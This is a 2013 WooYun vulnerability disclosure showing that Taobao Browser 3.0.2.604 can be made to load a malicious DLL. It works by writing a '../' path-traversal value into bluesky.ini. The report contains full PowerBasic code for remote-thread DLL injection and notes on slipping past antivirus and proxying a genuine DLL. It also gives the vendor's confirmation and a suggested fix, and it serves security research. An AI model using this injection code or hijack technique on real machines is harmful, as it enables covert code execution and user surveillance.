当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025715

漏洞标题:淘宝浏览器3.0.2.604修改配置可能导致本地的DLL注入

相关厂商:淘宝网

漏洞作者: blast

提交时间:2013-06-12 09:33

修复时间:2013-09-10 09:33

公开时间:2013-09-10 09:33

漏洞类型:设计错误/逻辑缺陷

危害等级:低

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-06-12: 细节已通知厂商并且等待厂商处理中
2013-06-14: 厂商已经确认,细节仅向厂商公开
2013-06-17: 细节向第三方安全合作伙伴开放
2013-08-08: 细节向核心白帽子及相关领域专家公开
2013-08-18: 细节向普通白帽子公开
2013-08-28: 细节向实习白帽子公开
2013-09-10: 细节向公众公开

简要描述:

淘宝浏览器3.0.2.604(2013.3.20)修改配置文件可能导致本地的DLL注入

详细说明:

家里电脑上的,淘宝浏览器3.0.2.604(2013.3.20)版本,程序启动时会加载框架bluesky.dll,这个文件的路径,程序是通过bluesky.ini来确定的,所以修改配置文件:

\TaoBrowser\bluesky.ini


的内容为

[Common]
Version = ../../../../../../../../1111


即会让程序启动时加载(假设安装路径为c:\taobao\)c:\taobao\..\..\..\..\..\..\..\1111\bluesky.dll,也即c:\1111\bluesky.dll。
当然不局限于这一个DLL,因为覆盖了这个DLL之后,整个窗体就启动不了了。这个文件夹下面还有很多文件,通过检查与功能之间的关联,也可以通过覆盖某个DLL使得用户执行某个功能时触发恶意木马(例如更新功能的AliUpdate.dll)
假设bluesky.dll是恶意木马,那么用户打开淘宝浏览器之后,这个文件就会被浏览器加载,如果杀毒软件并没有它的定义的话,这儿杀毒软件默认是放行的(可能是因为白加黑,家里机器使用的是360杀毒,包括注入也没有提示).
DLL注入后将可以监视用户的动作,执行其它危险操作,etc...
漏洞的可能利用方法:配置文件的修改者可以是一个会1、释放文件,2、修改配置的木马。这两个动作都很接近正常程序的行为,所以一般不会达到触发杀毒软件主动防御的行为分值。
而伪造部分,例如想伪造的是Alixxx.dll,攻击者可以构造一个假的Alixxx.dll,输出表和Alixxx.dll一样,等浏览器调用假的Alixxx.dll时,由于真的也在那儿,假的Alixxx.dll可以调用真的Alixxx.dll的函数并把结果返回给浏览器,同时也可以执行自己的代码

漏洞证明:

dll被载入TAOBROWSER.EXE

QQ图片20130611231917.jpg


DLL提示的注入窗口:

QQ图片20130611231926.jpg


注入成功(-1=失败,0=成功):

1233.JPG


由于是老妈用的机器,所以没装什么编译程序,临时下了个POWERBASIC的程序,代码用的以前写的,所以功能简陋,只是为了测试一下:

#COMPILE DLL
#DIM ALL
%USEMACROS = 1
#INCLUDE "D:\PowerBasic\MAINDIR\WinAPI\Win32API.inc"
GLOBAL ghInstance AS DWORD
'-- INJECT.INC --------------------------------------------------------------
DECLARE FUNCTION Get_hModule(BYVAL PID AS DWORD, DllPath$) AS DWORD
DECLARE FUNCTION Inject_DLL(BYVAL PID AS DWORD, DllPath$) AS LONG
DECLARE FUNCTION Eject_DLL(BYVAL PID AS DWORD, BYVAL hModule AS DWORD) AS LONG
'-- Declares not found in WIN32API.INC
DECLARE FUNCTION EnumProcessModules LIB "PSAPI.DLL" ALIAS "EnumProcessModules" _
      (BYVAL hProcess AS DWORD, hModule AS DWORD, _
       BYVAL cb AS DWORD, cbNeeded AS DWORD) AS DWORD
DECLARE FUNCTION GetModuleFileNameEx LIB "PSAPI.DLL" ALIAS "GetModuleFileNameExA" _
      (BYVAL hProcess AS DWORD, BYVAL hModule AS DWORD, _
       Filename AS ASCIIZ, BYVAL nSize AS DWORD) AS DWORD
'====================
FUNCTION Get_hModule(BYVAL PID AS DWORD, DllPath$) AS DWORD
'-- Returns handle to running module specified in DllPath$, or zero if not found
'-- PID = process ID of running process; DllPath$ = path+filename of DLL
REGISTER i&, result&
LOCAL  cb, cbNeeded, nModules AS LONG, hProcess, found, hModules() AS DWORD
LOCAL dll$, ModuleName AS ASCIIZ * %MAX_PATH
hProcess = OpenProcess(%PROCESS_QUERY_INFORMATION OR %PROCESS_VM_READ, %FALSE, PID)
IF hProcess THEN
   cb = 100
   DO
      REDIM hModules(1 TO cb \ 4)
      result = EnumProcessModules(hProcess, hModules(1), cb, cbNeeded)
      IF result = 0 THEN 'call failed
         cbNeeded = 0 : EXIT DO
      END IF
      IF cb > cbNeeded THEN EXIT DO
      cb = cb * 2
   LOOP
   nModules = cbNeeded \ 4
   DLL = UCASE$(DllPath$)
   FOR i = 1 TO nModules
      result = GetModuleFileNameEx(hProcess, hModules(i), _
                                   ModuleName, SIZEOF(ModuleName))
      IF result THEN
         IF UCASE$(RTRIM$(ModuleName,$NUL)) = DLL THEN
            found = hModules(i) : EXIT FOR
         END IF
      END IF
   NEXT i
   CloseHandle hProcess
END IF 'hProcess
FUNCTION = found
END FUNCTION
'====================
FUNCTION Inject_DLL(BYVAL PID AS DWORD, DllPath$) AS LONG
REGISTER hProcess&, hThread&
LOCAL ecode&, pLoadLibraryA, pRemoteBuffer AS DWORD
ecode = -1  'default to error
hProcess = OpenProcess(%PROCESS_CREATE_THREAD OR %PROCESS_QUERY_INFORMATION OR _
                       %PROCESS_VM_OPERATION  OR %PROCESS_VM_READ OR _
                       %PROCESS_VM_WRITE, %FALSE, PID)
IF hProcess THEN
   pLoadLibraryA = GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA")
   pRemoteBuffer = VirtualAllocEx(hProcess, BYVAL %NULL, LEN(DllPath$), _
                                  %MEM_COMMIT, %PAGE_READWRITE)
   IF pRemoteBuffer AND pLoadLibraryA THEN
      IF WriteProcessMemory(BYVAL hProcess, BYVAL pRemoteBuffer, _
                            BYVAL STRPTR(DllPath$), LEN(DllPath$), %NULL) THEN
         hThread = CreateRemoteThread(BYVAL hProcess, BYVAL %NULL, 0&, _
                                      BYVAL pLoadLibraryA, BYVAL pRemoteBuffer, _
                                      0, %NULL)
         IF hThread THEN
            WaitForSingleObject hThread, %INFINITE
            CloseHandle hThread
            ecode = 0
         END IF
      END IF
      VirtualFreeEx hProcess, pRemoteBuffer, 0, %MEM_RELEASE
   END IF 'pRemoteBuffer AND pLoadLibraryA
   CloseHandle hProcess
END IF 'hProcess
FUNCTION = ecode
END FUNCTION
'====================
FUNCTION Eject_DLL(BYVAL PID AS DWORD, BYVAL hModule AS DWORD) AS LONG
REGISTER hProcess&, hThread&
LOCAL ecode&, pFreeLibrary, pRemoteBuffer AS DWORD
ecode = -1  'default to error
hProcess = OpenProcess(%PROCESS_CREATE_THREAD OR %PROCESS_QUERY_INFORMATION OR _
                       %PROCESS_VM_OPERATION  OR %PROCESS_VM_READ OR _
                       %PROCESS_VM_WRITE, %FALSE, PID)
IF hProcess THEN
   pFreeLibrary = GetProcAddress(GetModuleHandle("Kernel32"), "FreeLibrary")
   IF pFreeLibrary THEN
      hThread = CreateRemoteThread(BYVAL hProcess, BYVAL %NULL, 0&, _
                                   BYVAL pFreeLibrary, BYVAL hModule, 0, %NULL)
      IF hThread THEN
         WaitForSingleObject hThread, %INFINITE
         CloseHandle hThread
         ecode = 0
      END IF
   END IF
   CloseHandle hProcess
END IF 'hProcess
FUNCTION = ecode
END FUNCTION
'-- END INJECT.INC ----------------------------------------------------------
FUNCTION LIBMAIN (BYVAL hInstance   AS LONG, _
                  BYVAL fwdReason   AS LONG, _
                  BYVAL lpvReserved AS LONG) AS LONG
    DIM sFileName AS ASCIIZ * 256
    DIM sModuleFilePath AS ASCIIZ * %MAX_PATH
    DIM sNameCut AS ASCIIZ * %MAX_PATH
    
    LOCAL ecode&, hmodule, pid AS DWORD
    LOCAL DllPath$, exepath AS ASCIIZ * %MAX_PATH
    GetModuleFileName GetModuleHandle(""), exepath, SIZEOF(exepath)
    DllPath = "D:\PowerBasic\MAINDIR\t2.dll"
    IF pid = 0 THEN pid = VAL(INPUTBOX$("Enter target process id", DllPath))
    IF pid = 0 THEN EXIT FUNCTION
    hModule = Get_hModule(pid, DllPath)
    IF hModule THEN
       MSGBOX "已被注入,尝试清除中",,DllPath
       ecode = Eject_DLL(pid, hModule)
       MSGBOX "Final eject ecode:" + STR$(ecode),,DllPath
    ELSE
       MSGBOX "未被注入,尝试注入中",,DllPath
       ecode = Inject_DLL(pid, DllPath)
       MSGBOX "Final inject ecode:" + STR$(ecode),,DllPath
    END IF
    
    
    
  '  SELECT CASE fwdReason
  '  CASE %DLL_PROCESS_ATTACH
  '      ghInstance = hInstance
  '      FUNCTION = 1   'success!
        GetModuleFileName(hInstance, sFileName, 255)
        CALL GetModuleFileName( CDWD(&H0), sModuleFilePath, CDWD(%MAX_PATH) )
       ' sNameCut = Parse$( sModuleFilePath, "\", ParseCount(sModuleFilePath, "\") )
       ' sModuleFilePath = RTrim$( sModuleFilePath, sNameCut )
        MSGBOX "The dll" + sFileName + " is being attached into : " + sModuleFilePath
        'FUNCTION = 0   'failure!  This will prevent the EXE from running.
'    CASE %DLL_PROCESS_DETACH
'         FUNCTION = 1   'success!
'     CASE %DLL_THREAD_ATTACH
'         FUNCTION = 1   'success!
'    CASE %DLL_THREAD_DETACH
'         FUNCTION = 1   'success!
 '   END SELECT
END FUNCTION


DLL以及设置

1333.JPG

修复方案:

过滤好../这种相对路径的字符

版权声明:转载请注明来源 blast@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-06-14 11:30

厂商回复:

感谢你对我们的支持与关注,该问题我们正在修复~ ^_^

最新状态:

暂无